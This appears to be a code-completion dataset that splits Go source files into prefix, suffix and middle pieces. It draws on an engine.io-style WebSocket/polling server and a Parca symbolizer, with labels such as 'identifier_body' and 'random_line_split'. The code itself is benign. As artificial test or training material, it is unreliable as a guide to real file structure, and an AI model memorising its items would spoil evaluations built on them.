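//	s.handlePacket(packet{typ: packetTypePing, data: pingData}, c)
//	// -> encodes packet{typ: packetTypePong, data: pingData} to c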
// wsHandler continuously receives on the given WebSocket
// connection and delegates the packets received to the
// appropriate handler functions.
func (s *server) wsHandler(ws *websocket.Conn) {
// If the client initially attempts to connect directly using
// WebSocket transport, the session ID parameter will be empty.
// Otherwise, the connection with the given session ID will
// need to be upgraded.
glog.Infoln("Starting websocket handler...")
var c *conn
wsEncoder, wsDecoder := newPacketEncoder(ws), newPacketDecoder(ws)
for {
if c != nil {
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
break
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypeUpgrade {
// Upgrade the connection to use this WebSocket Conn.
c.upgrade(ws)
continue
}
if err := s.handlePacket(pkt, c); err != nil {
glog.Errorf("could not handle packet: %v", err)
break
}
continue
}
id := ws.Request().FormValue(paramSessionID)
c = s.clients.get(id)
if len(id) > 0 && c == nil {
serverError(ws, errorUnknownSID)
break
} else if len(id) > 0 && c != nil {
// The initial handshake requires a ping (2) and pong (3) echo.
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
continue
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypePing {
glog.Infof("got ping packet with data %s", pkt.data)
if err := wsEncoder.encode(packet{typ: packetTypePong, data: pkt.data}); err != nil {
glog.Errorf("could not encode pong packet: %v", err)
continue
}
// Force a polling cycle to ensure a fast upgrade.
glog.Infoln("forcing polling cycle")
payload := []packet{packet{typ: packetTypeNoop}}
if err := newPayloadEncoder(c).encode(payload); err != nil {
glog.Errorf("could not encode packet to force polling cycle: %v", err)
continue
}
}
} else if len(id) == 0 && c == nil {
// Create a new connection with this WebSocket Conn.
c = newConn()
c.ws = ws
s.clients.add(c)
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
if err := wsEncoder.encode(packet{typ: packetTypeOpen, data: b}); err != nil {
glog.Errorf("could not encode open packet: %v", err)
break
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
}
glog.Infof("closing websocket connection %p", ws)
if c != nil {
c.Close()
}
}
// pollingHandler handles all XHR polling requests to the server, initiating
// a handshake if the request’s session ID does not already exist within
// the client set.
func (s *server) pollingHandler(w http.ResponseWriter, r *http.Request) {
setPollingHeaders(w, r)
id := r.FormValue(paramSessionID)
if len(id) > 0 {
c := s.clients.get(id)
if c == nil {
serverError(w, errorUnknownSID)
return
}
if r.Method == "POST" {
var payload []packet
if err := newPayloadDecoder(r.Body).decode(&payload); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
defer r.Body.Close()
for _, pkt := range payload {
s.handlePacket(pkt, c)
}
fmt.Fprintf(w, "ok")
return
} else if r.Method == "GET" {
glog.Infoln("GET request xhr polling data...")
// TODO(andybons): Requests can pile up here. Drain the conn and
// then write the payload.
if _, err := io.Copy(w, c); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
return
}
http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
return
}
s.pollingHandshake(w, r)
}
// pollingHandshake creates a new FTC Conn with the given HTTP Request and
// ResponseWriter, setting a persistence cookie if necessary and calling
// the server’s Handler.
func (s *server) pollingHandshake(w http.ResponseWriter, r *http.Request) {
c := newConn()
s.clients.add(c)
if len(s.cookieName) > 0 {
http.SetCookie(w, &http.Cookie{
Name: s.cookieName,
Value: c.id,
})
}
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
payload := []packet{packet{typ: packetTypeOpen, data: b}}
if err := newPayloadEncoder(w).encode(payload); err != nil {
| s.Handler != nil {
go s.Handler(c.pubConn)
}
}
// ServeHTTP implements the http.Handler interface for an FTC Server.
func (s *server) ServeHTTP(w http.ResponseWriter, r * | glog.Errorf("could not encode open payload: %v", err)
return
}
if | conditional_block |
server.go | upgrades[i] = u
i++
}
return upgrades
}
// A Handler is called by the server when a connection is
// opened successfully.
type Handler func(*Conn)
type server struct {
// Handler handles an FTC connection.
Handler
basePath string
cookieName string
clients *clientSet // The set of connections (some may be closed).
wsServer *websocket.Server // The underlying WebSocket server.
}
// The defaults for options passed to the server.
const (
defaultBasePath = "/engine.io/"
defaultCookieName = "io"
)
// Options are the parameters passed to the server.
type Options struct {
// BasePath is the base URL path that the server handles requests for.
BasePath string
// CookieName is the name of the cookie set upon successful handshake.
CookieName string
}
// NewServer allocates and returns a new server with the given
// options and handler. If nil options are passed, the defaults
// specified in the constants above are used instead.
func NewServer(o *Options, h Handler) *server {
opts := Options{}
if o != nil {
opts = *o
}
if len(opts.BasePath) == 0 {
opts.BasePath = defaultBasePath
}
if len(opts.CookieName) == 0 {
opts.CookieName = defaultCookieName
}
s := &server{
Handler: h,
basePath: opts.BasePath,
cookieName: opts.CookieName,
clients: &clientSet{clients: map[string]*conn{}},
}
go s.startReaper()
s.wsServer = &websocket.Server{Handler: s.wsHandler}
return s
}
// startReaper continuously removes closed connections from the
// client set via the reap function.
func (s *server) startReaper() {
for {
if s.clients == nil {
glog.Fatal("server cannot have a nil client set")
}
s.clients.reap()
numClients.Set(int64(s.clients.len()))
time.Sleep(clientReapTimeout)
}
}
// handlePacket takes the given packet and writes the appropriate
// response to the given connection.
func (s *server) handlePacket(p packet, c *conn) error {
glog.Infof("handling packet type: %c, data: %s, upgraded: %t", p.typ, p.data, c.upgraded())
var encode func(packet) error
if c.upgraded() {
encode = newPacketEncoder(c).encode
} else {
encode = func(pkt packet) error {
return newPayloadEncoder(c).encode([]packet{pkt})
}
}
switch p.typ {
case packetTypePing:
return encode(packet{typ: packetTypePong, data: p.data})
case packetTypeMessage:
if c.pubConn != nil {
c.pubConn.onMessage(p.data)
}
case packetTypeClose:
c.Close()
}
return nil
}
// wsHandler continuously receives on the given WebSocket
// connection and delegates the packets received to the
// appropriate handler functions.
func (s *server) wsHandler(ws *websocket.Conn) {
// If the client initially attempts to connect directly using
// WebSocket transport, the session ID parameter will be empty.
// Otherwise, the connection with the given session ID will
// need to be upgraded.
glog.Infoln("Starting websocket handler...")
var c *conn
wsEncoder, wsDecoder := newPacketEncoder(ws), newPacketDecoder(ws)
for {
if c != nil {
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
break
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypeUpgrade {
// Upgrade the connection to use this WebSocket Conn.
c.upgrade(ws)
continue
}
if err := s.handlePacket(pkt, c); err != nil {
glog.Errorf("could not handle packet: %v", err)
break
}
continue
}
id := ws.Request().FormValue(paramSessionID)
c = s.clients.get(id)
if len(id) > 0 && c == nil {
serverError(ws, errorUnknownSID)
break
} else if len(id) > 0 && c != nil {
// The initial handshake requires a ping (2) and pong (3) echo.
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
continue
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypePing {
glog.Infof("got ping packet with data %s", pkt.data)
if err := wsEncoder.encode(packet{typ: packetTypePong, data: pkt.data}); err != nil {
glog.Errorf("could not encode pong packet: %v", err)
continue
}
// Force a polling cycle to ensure a fast upgrade.
glog.Infoln("forcing polling cycle")
payload := []packet{packet{typ: packetTypeNoop}}
if err := newPayloadEncoder(c).encode(payload); err != nil {
glog.Errorf("could not encode packet to force polling cycle: %v", err)
continue
}
}
} else if len(id) == 0 && c == nil {
// Create a new connection with this WebSocket Conn.
c = newConn()
c.ws = ws
s.clients.add(c)
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
if err := wsEncoder.encode(packet{typ: packetTypeOpen, data: b}); err != nil {
glog.Errorf("could not encode open packet: %v", err)
break
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
}
glog.Infof("closing websocket connection %p", ws)
if c != nil {
c.Close()
}
}
// pollingHandler handles all XHR polling requests to the server, initiating
// a handshake if the request’s session ID does not already exist within
// the client set.
func (s *server) pollingHandler(w http.ResponseWriter, r *http.Request) {
setPollingHeaders(w, r)
id := r.FormValue(paramSessionID)
if len(id) > 0 {
c := s.clients.get(id)
if c == nil {
serverError(w, errorUnknownSID)
return
}
if r.Method == "POST" {
var payload []packet
if err := newPayloadDecoder(r.Body).decode(&payload); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
defer r.Body.Close()
for _, pkt := range payload {
s.handlePacket(pkt, c)
}
fmt.Fprintf(w, "ok")
return
} else if r.Method == "GET" {
glog.Infoln("GET request xhr polling data...")
// TODO(andybons): Requests can pile up here. Drain the conn and
// then write the payload.
if _, err := io.Copy(w, c); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
return
}
http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
return
}
s.pollingHandshake(w, r)
}
// pollingHandshake creates a new FTC Conn with the given HTTP Request and
// ResponseWriter, setting a persistence cookie if necessary and calling
// the server’s Handler.
func (s *server) pollingHandshake(w http.ResponseWriter, r *http.Request) {
c := newConn()
s.clients.add(c)
if len(s.cookieName) > 0 {
http.SetCookie(w, &http.Cookie{
Name: s.cookieName,
Value: c.id,
})
}
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
payload := []packet{packet{typ: packetTypeOpen, data: b}}
if err := newPayloadEncoder(w).encode(payload); err != nil {
glog.Errorf("could not encode open payload: %v", err)
return
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
// ServeHTTP implements the http.Handler interface for an FTC Server.
func (s *server) ServeHTTP(w http.ResponseWriter, r *http.Request) {
r | emoteAddr := r.Header.Get("X-Forwarded-For")
if len(remoteAddr) == 0 {
remoteAddr = r.RemoteAddr
}
glog.Infof("%s (%s) %s %s %s", r.Proto, r.Header.Get("X-Forwarded-Proto"), r.Method, remoteAddr, r.URL)
transport := r.FormValue(paramTransport)
if strings.HasPrefix(r.URL.Path, s.basePath) && !validTransports[transport] {
serverError(w, errorTransportUnknown)
return
}
if transport == transportWebSocket {
s.wsServer.ServeHTTP(w, r)
} else if transport == transportPolling {
s.pollingHandler(w, r)
}
}
// | identifier_body |
|
server.go | ReapTimeout = 5 * time.Second
)
var errorMessage = map[int]string{
errorTransportUnknown: "Transport unknown",
errorUnknownSID: "Session ID unknown",
errorBadHandshakeMethod: "Bad handshake method",
errorBadRequest: "Bad request",
}
var (
validTransports = map[string]bool{
transportWebSocket: true,
transportPolling: true,
}
validUpgrades = map[string]bool{
transportWebSocket: true,
}
)
// getValidUpgrades returns a slice containing the valid protocols
// that a connection can upgrade to.
func getValidUpgrades() []string {
upgrades := make([]string, len(validUpgrades))
i := 0
for u := range validUpgrades {
upgrades[i] = u
i++
}
return upgrades
}
// A Handler is called by the server when a connection is
// opened successfully.
type Handler func(*Conn)
type server struct {
// Handler handles an FTC connection.
Handler
basePath string
cookieName string
clients *clientSet // The set of connections (some may be closed).
wsServer *websocket.Server // The underlying WebSocket server.
}
// The defaults for options passed to the server.
const (
defaultBasePath = "/engine.io/"
defaultCookieName = "io"
)
// Options are the parameters passed to the server.
type Options struct {
// BasePath is the base URL path that the server handles requests for.
BasePath string
// CookieName is the name of the cookie set upon successful handshake. | // options and handler. If nil options are passed, the defaults
// specified in the constants above are used instead.
func NewServer(o *Options, h Handler) *server {
opts := Options{}
if o != nil {
opts = *o
}
if len(opts.BasePath) == 0 {
opts.BasePath = defaultBasePath
}
if len(opts.CookieName) == 0 {
opts.CookieName = defaultCookieName
}
s := &server{
Handler: h,
basePath: opts.BasePath,
cookieName: opts.CookieName,
clients: &clientSet{clients: map[string]*conn{}},
}
go s.startReaper()
s.wsServer = &websocket.Server{Handler: s.wsHandler}
return s
}
// startReaper continuously removes closed connections from the
// client set via the reap function.
func (s *server) startReaper() {
for {
if s.clients == nil {
glog.Fatal("server cannot have a nil client set")
}
s.clients.reap()
numClients.Set(int64(s.clients.len()))
time.Sleep(clientReapTimeout)
}
}
// handlePacket takes the given packet and writes the appropriate
// response to the given connection.
func (s *server) handlePacket(p packet, c *conn) error {
glog.Infof("handling packet type: %c, data: %s, upgraded: %t", p.typ, p.data, c.upgraded())
var encode func(packet) error
if c.upgraded() {
encode = newPacketEncoder(c).encode
} else {
encode = func(pkt packet) error {
return newPayloadEncoder(c).encode([]packet{pkt})
}
}
switch p.typ {
case packetTypePing:
return encode(packet{typ: packetTypePong, data: p.data})
case packetTypeMessage:
if c.pubConn != nil {
c.pubConn.onMessage(p.data)
}
case packetTypeClose:
c.Close()
}
return nil
}
// wsHandler continuously receives on the given WebSocket
// connection and delegates the packets received to the
// appropriate handler functions.
func (s *server) wsHandler(ws *websocket.Conn) {
// If the client initially attempts to connect directly using
// WebSocket transport, the session ID parameter will be empty.
// Otherwise, the connection with the given session ID will
// need to be upgraded.
glog.Infoln("Starting websocket handler...")
var c *conn
wsEncoder, wsDecoder := newPacketEncoder(ws), newPacketDecoder(ws)
for {
if c != nil {
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
break
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypeUpgrade {
// Upgrade the connection to use this WebSocket Conn.
c.upgrade(ws)
continue
}
if err := s.handlePacket(pkt, c); err != nil {
glog.Errorf("could not handle packet: %v", err)
break
}
continue
}
id := ws.Request().FormValue(paramSessionID)
c = s.clients.get(id)
if len(id) > 0 && c == nil {
serverError(ws, errorUnknownSID)
break
} else if len(id) > 0 && c != nil {
// The initial handshake requires a ping (2) and pong (3) echo.
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
continue
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypePing {
glog.Infof("got ping packet with data %s", pkt.data)
if err := wsEncoder.encode(packet{typ: packetTypePong, data: pkt.data}); err != nil {
glog.Errorf("could not encode pong packet: %v", err)
continue
}
// Force a polling cycle to ensure a fast upgrade.
glog.Infoln("forcing polling cycle")
payload := []packet{packet{typ: packetTypeNoop}}
if err := newPayloadEncoder(c).encode(payload); err != nil {
glog.Errorf("could not encode packet to force polling cycle: %v", err)
continue
}
}
} else if len(id) == 0 && c == nil {
// Create a new connection with this WebSocket Conn.
c = newConn()
c.ws = ws
s.clients.add(c)
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
if err := wsEncoder.encode(packet{typ: packetTypeOpen, data: b}); err != nil {
glog.Errorf("could not encode open packet: %v", err)
break
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
}
glog.Infof("closing websocket connection %p", ws)
if c != nil {
c.Close()
}
}
// pollingHandler handles all XHR polling requests to the server, initiating
// a handshake if the request’s session ID does not already exist within
// the client set.
func (s *server) pollingHandler(w http.ResponseWriter, r *http.Request) {
setPollingHeaders(w, r)
id := r.FormValue(paramSessionID)
if len(id) > 0 {
c := s.clients.get(id)
if c == nil {
serverError(w, errorUnknownSID)
return
}
if r.Method == "POST" {
var payload []packet
if err := newPayloadDecoder(r.Body).decode(&payload); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
defer r.Body.Close()
for _, pkt := range payload {
s.handlePacket(pkt, c)
}
fmt.Fprintf(w, "ok")
return
} else if r.Method == "GET" {
glog.Infoln("GET request xhr polling data...")
// TODO(andybons): Requests can pile up here. Drain the conn and
// then write the payload.
if _, err := io.Copy(w, c); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
return
}
http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
return
}
s.pollingHandshake(w, r)
}
// pollingHandshake creates a new FTC Conn with the given HTTP Request and
// ResponseWriter, setting a persistence cookie if necessary and calling
// the server’s Handler.
func (s *server) pollingHandshake(w http.ResponseWriter, r *http.Request) {
c := newConn()
s.clients.add(c)
if len(s.cookieName) > 0 {
http.SetCookie(w, &http.Cookie{
Name: s.cookieName,
Value: c.id,
})
}
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
payload := []packet{packet{typ: packetTypeOpen, data: b}}
if err := newPayloadEncoder(w).encode(payload); err != nil {
glog.Errorf("could not encode open payload: %v", err)
return
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
// ServeHTTP implements the http.Handler interface for an FTC Server.
func (s *server) ServeHTTP(w http.ResponseWriter, r *http.Request | CookieName string
}
// NewServer allocates and returns a new server with the given | random_line_split |
server.go | by the server when a connection is
// opened successfully.
type Handler func(*Conn)
type server struct {
// Handler handles an FTC connection.
Handler
basePath string
cookieName string
clients *clientSet // The set of connections (some may be closed).
wsServer *websocket.Server // The underlying WebSocket server.
}
// The defaults for options passed to the server.
const (
defaultBasePath = "/engine.io/"
defaultCookieName = "io"
)
// Options are the parameters passed to the server.
type Options struct {
// BasePath is the base URL path that the server handles requests for.
BasePath string
// CookieName is the name of the cookie set upon successful handshake.
CookieName string
}
// NewServer allocates and returns a new server with the given
// options and handler. If nil options are passed, the defaults
// specified in the constants above are used instead.
func NewServer(o *Options, h Handler) *server {
opts := Options{}
if o != nil {
opts = *o
}
if len(opts.BasePath) == 0 {
opts.BasePath = defaultBasePath
}
if len(opts.CookieName) == 0 {
opts.CookieName = defaultCookieName
}
s := &server{
Handler: h,
basePath: opts.BasePath,
cookieName: opts.CookieName,
clients: &clientSet{clients: map[string]*conn{}},
}
go s.startReaper()
s.wsServer = &websocket.Server{Handler: s.wsHandler}
return s
}
// startReaper continuously removes closed connections from the
// client set via the reap function.
func (s *server) startReaper() {
for {
if s.clients == nil {
glog.Fatal("server cannot have a nil client set")
}
s.clients.reap()
numClients.Set(int64(s.clients.len()))
time.Sleep(clientReapTimeout)
}
}
// handlePacket takes the given packet and writes the appropriate
// response to the given connection.
func (s *server) handlePacket(p packet, c *conn) error {
glog.Infof("handling packet type: %c, data: %s, upgraded: %t", p.typ, p.data, c.upgraded())
var encode func(packet) error
if c.upgraded() {
encode = newPacketEncoder(c).encode
} else {
encode = func(pkt packet) error {
return newPayloadEncoder(c).encode([]packet{pkt})
}
}
switch p.typ {
case packetTypePing:
return encode(packet{typ: packetTypePong, data: p.data})
case packetTypeMessage:
if c.pubConn != nil {
c.pubConn.onMessage(p.data)
}
case packetTypeClose:
c.Close()
}
return nil
}
// wsHandler continuously receives on the given WebSocket
// connection and delegates the packets received to the
// appropriate handler functions.
func (s *server) wsHandler(ws *websocket.Conn) {
// If the client initially attempts to connect directly using
// WebSocket transport, the session ID parameter will be empty.
// Otherwise, the connection with the given session ID will
// need to be upgraded.
glog.Infoln("Starting websocket handler...")
var c *conn
wsEncoder, wsDecoder := newPacketEncoder(ws), newPacketDecoder(ws)
for {
if c != nil {
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
break
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypeUpgrade {
// Upgrade the connection to use this WebSocket Conn.
c.upgrade(ws)
continue
}
if err := s.handlePacket(pkt, c); err != nil {
glog.Errorf("could not handle packet: %v", err)
break
}
continue
}
id := ws.Request().FormValue(paramSessionID)
c = s.clients.get(id)
if len(id) > 0 && c == nil {
serverError(ws, errorUnknownSID)
break
} else if len(id) > 0 && c != nil {
// The initial handshake requires a ping (2) and pong (3) echo.
var pkt packet
if err := wsDecoder.decode(&pkt); err != nil {
glog.Errorf("could not decode packet: %v", err)
continue
}
glog.Infof("WS: got packet type: %c, data: %s", pkt.typ, pkt.data)
if pkt.typ == packetTypePing {
glog.Infof("got ping packet with data %s", pkt.data)
if err := wsEncoder.encode(packet{typ: packetTypePong, data: pkt.data}); err != nil {
glog.Errorf("could not encode pong packet: %v", err)
continue
}
// Force a polling cycle to ensure a fast upgrade.
glog.Infoln("forcing polling cycle")
payload := []packet{packet{typ: packetTypeNoop}}
if err := newPayloadEncoder(c).encode(payload); err != nil {
glog.Errorf("could not encode packet to force polling cycle: %v", err)
continue
}
}
} else if len(id) == 0 && c == nil {
// Create a new connection with this WebSocket Conn.
c = newConn()
c.ws = ws
s.clients.add(c)
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
if err := wsEncoder.encode(packet{typ: packetTypeOpen, data: b}); err != nil {
glog.Errorf("could not encode open packet: %v", err)
break
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
}
glog.Infof("closing websocket connection %p", ws)
if c != nil {
c.Close()
}
}
// pollingHandler handles all XHR polling requests to the server, initiating
// a handshake if the request’s session ID does not already exist within
// the client set.
func (s *server) pollingHandler(w http.ResponseWriter, r *http.Request) {
setPollingHeaders(w, r)
id := r.FormValue(paramSessionID)
if len(id) > 0 {
c := s.clients.get(id)
if c == nil {
serverError(w, errorUnknownSID)
return
}
if r.Method == "POST" {
var payload []packet
if err := newPayloadDecoder(r.Body).decode(&payload); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
defer r.Body.Close()
for _, pkt := range payload {
s.handlePacket(pkt, c)
}
fmt.Fprintf(w, "ok")
return
} else if r.Method == "GET" {
glog.Infoln("GET request xhr polling data...")
// TODO(andybons): Requests can pile up here. Drain the conn and
// then write the payload.
if _, err := io.Copy(w, c); err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
return
}
http.Error(w, http.StatusText(http.StatusBadRequest), http.StatusBadRequest)
return
}
s.pollingHandshake(w, r)
}
// pollingHandshake creates a new FTC Conn with the given HTTP Request and
// ResponseWriter, setting a persistence cookie if necessary and calling
// the server’s Handler.
func (s *server) pollingHandshake(w http.ResponseWriter, r *http.Request) {
c := newConn()
s.clients.add(c)
if len(s.cookieName) > 0 {
http.SetCookie(w, &http.Cookie{
Name: s.cookieName,
Value: c.id,
})
}
b, err := handshakeData(c)
if err != nil {
glog.Errorf("could not get handshake data: %v", err)
}
payload := []packet{packet{typ: packetTypeOpen, data: b}}
if err := newPayloadEncoder(w).encode(payload); err != nil {
glog.Errorf("could not encode open payload: %v", err)
return
}
if s.Handler != nil {
go s.Handler(c.pubConn)
}
}
// ServeHTTP implements the http.Handler interface for an FTC Server.
func (s *server) ServeHTTP(w http.ResponseWriter, r *http.Request) {
remoteAddr := r.Header.Get("X-Forwarded-For")
if len(remoteAddr) == 0 {
remoteAddr = r.RemoteAddr
}
glog.Infof("%s (%s) %s %s %s", r.Proto, r.Header.Get("X-Forwarded-Proto"), r.Method, remoteAddr, r.URL)
transport := r.FormValue(paramTransport)
if strings.HasPrefix(r.URL.Path, s.basePath) && !validTransports[transport] {
serverError(w, errorTransportUnknown)
return
}
if transport == transportWebSocket {
s.wsServer.ServeHTTP(w, r)
} else if transport == transportPolling {
s.pollingHandler(w, r)
}
}
// handshakeData returns the JSON encoded data needed
// for the initial connection handshake.
func hand | shakeData(c * | identifier_name |
|
symbolizer.go | liner file", "err", err)
}
}
s.linerCache = newLinerCache
numFunctions := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
numFunctions += len(locationLines)
}
}
if numFunctions == 0 {
return nil
}
functions := make([]*pb.Function, numFunctions)
numLocations := 0
i := 0
for _, locationsByMapping := range locationsByMappings {
for _, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
numLocations++
for _, line := range locationLines {
functions[i] = line.Function
i++
}
}
}
fres, err := s.metastore.GetOrCreateFunctions(ctx, &pb.GetOrCreateFunctionsRequest{Functions: functions})
if err != nil {
s.errors.WithLabelValues("get_or_create_functions").Inc()
return fmt.Errorf("get or create functions: %w", err)
}
locations = make([]*pb.Location, 0, numLocations)
i = 0
for _, locationsByMapping := range locationsByMappings {
for j, locationLines := range locationsByMapping.LocationsLines {
if len(locationLines) == 0 {
continue
}
lines := make([]*pb.Line, 0, len(locationLines))
for _, line := range locationLines {
lines = append(lines, &pb.Line{
FunctionId: fres.Functions[i].Id,
Line: line.Line,
})
i++
}
// Update the location with the lines in-place so that in the next
// step we can just reuse the same locations as were originally
// passed in.
locations = append(locations, locationsByMapping.Locations[j])
locationsByMapping.Locations[j].Lines = lines
}
}
// At this point the locations are symbolized in-place and we can send them to the metastore.
defer func(begin time.Time) {
s.storeDuration.Observe(time.Since(begin).Seconds())
}(time.Now())
_, err = s.metastore.CreateLocationLines(ctx, &pb.CreateLocationLinesRequest{
Locations: locations,
})
if err != nil {
s.errors.WithLabelValues("create_location_lines").Inc()
return fmt.Errorf("create location lines: %w", err)
}
return nil
}
// symbolizeLocationsForMapping fetches the debug info for a given build ID and symbolizes the
// given locations.
func (s *Symbolizer) symbolizeLocationsForMapping(ctx context.Context, m *pb.Mapping, locations []*pb.Location) ([][]profile.LocationLine, liner, error) {
dbginfo, err := s.metadata.Fetch(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED)
if err != nil {
return nil, nil, fmt.Errorf("fetching metadata: %w", err)
}
if dbginfo.Quality != nil {
if dbginfo.Quality.NotValidElf {
return nil, nil, ErrNotValidElf
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check previously reported debuginfo quality: %w", ErrNoDebuginfo)
}
}
key := dbginfo.BuildId
countLocationsToSymbolize := s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
pcRange := s.pcRanges[key]
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), nil, nil
}
liner, found := s.linerCache[key]
if !found {
switch dbginfo.Source {
case debuginfopb.Debuginfo_SOURCE_UPLOAD:
if dbginfo.Upload.State != debuginfopb.DebuginfoUpload_STATE_UPLOADED {
return nil, nil, debuginfo.ErrNotUploadedYet
}
case debuginfopb.Debuginfo_SOURCE_DEBUGINFOD:
// Nothing to do here, just covering all cases.
default:
return nil, nil, debuginfo.ErrUnknownDebuginfoSource
}
// Fetch the debug info for the build ID.
rc, err := s.debuginfo.FetchDebuginfo(ctx, dbginfo)
if err != nil {
return nil, nil, fmt.Errorf("fetch debuginfo (BuildID: %q): %w", m.BuildId, err)
}
defer func() {
if err := rc.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo reader", "err", err)
}
}()
f, err := os.CreateTemp(s.tmpDir, "parca-symbolizer-*")
if err != nil {
return nil, nil, fmt.Errorf("create temp file: %w", err)
}
defer func() {
if err := f.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
if err := os.Remove(f.Name()); err != nil {
level.Error(s.logger).Log("msg", "failed to remove debuginfo file", "err", err)
}
}()
_, err = io.Copy(f, rc)
if err != nil {
return nil, nil, fmt.Errorf("copy debuginfo to temp file: %w", err)
}
e, err := elf.Open(f.Name())
if err != nil {
if merr := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, &debuginfopb.DebuginfoQuality{
NotValidElf: true,
}); merr != nil {
level.Error(s.logger).Log("msg", "failed to set metadata quality", "err", merr)
}
return nil, nil, fmt.Errorf("open temp file as ELF: %w", err)
}
defer func() {
if err := e.Close(); err != nil {
level.Error(s.logger).Log("msg", "failed to close debuginfo file", "err", err)
}
}()
if dbginfo.Quality == nil {
dbginfo.Quality = &debuginfopb.DebuginfoQuality{
HasDwarf: elfutils.HasDWARF(e),
HasGoPclntab: elfutils.HasGoPclntab(e),
HasSymtab: elfutils.HasSymtab(e),
HasDynsym: elfutils.HasDynsym(e),
}
if err := s.metadata.SetQuality(ctx, m.BuildId, debuginfopb.DebuginfoType_DEBUGINFO_TYPE_DEBUGINFO_UNSPECIFIED, dbginfo.Quality); err != nil {
return nil, nil, fmt.Errorf("set quality: %w", err)
}
if !dbginfo.Quality.HasDwarf && !dbginfo.Quality.HasGoPclntab && !(dbginfo.Quality.HasSymtab || dbginfo.Quality.HasDynsym) {
return nil, nil, fmt.Errorf("check debuginfo quality: %w", ErrNoDebuginfo)
}
}
liner, err = s.newLiner(f.Name(), e, dbginfo.Quality)
if err != nil {
return nil, nil, fmt.Errorf("new liner: %w", err)
}
}
pcRange, found := s.pcRanges[key]
if !found {
pcRange, err = liner.PCRange()
if err != nil {
return nil, liner, fmt.Errorf("get pc range: %w", err)
}
s.pcRanges[key] = pcRange
}
countLocationsToSymbolize = s.countLocationsToSymbolize(key, locations)
if countLocationsToSymbolize == 0 {
level.Debug(s.logger).Log("msg", "no locations to symbolize", "build_id", m.BuildId, "pc_range_start", fmt.Sprintf("0x%x", pcRange[0]), "pc_range_end", fmt.Sprintf("0x%x", pcRange[1]))
return make([][]profile.LocationLine, len(locations)), liner, nil
}
level.Debug(s.logger).Log("msg", "symbolizing locations", "build_id", m.BuildId, "count", countLocationsToSymbolize)
locationsLines := make([][]profile.LocationLine, len(locations))
for i, loc := range locations {
// Check if we already attempted to symbolize this location and failed.
// No need to try again.
if _, failedBefore := s.symbolizationFailed[dbginfo.BuildId][loc.Address]; failedBefore {
continue
}
if pcRange[0] <= loc.Address && loc.Address <= pcRange[1] {
locationsLines[i] = s.pcToLines(liner, key, loc.Address)
}
}
return locationsLines, liner, nil
}
func (s *Symbolizer) | countLocationsToSymbolize | identifier_name |
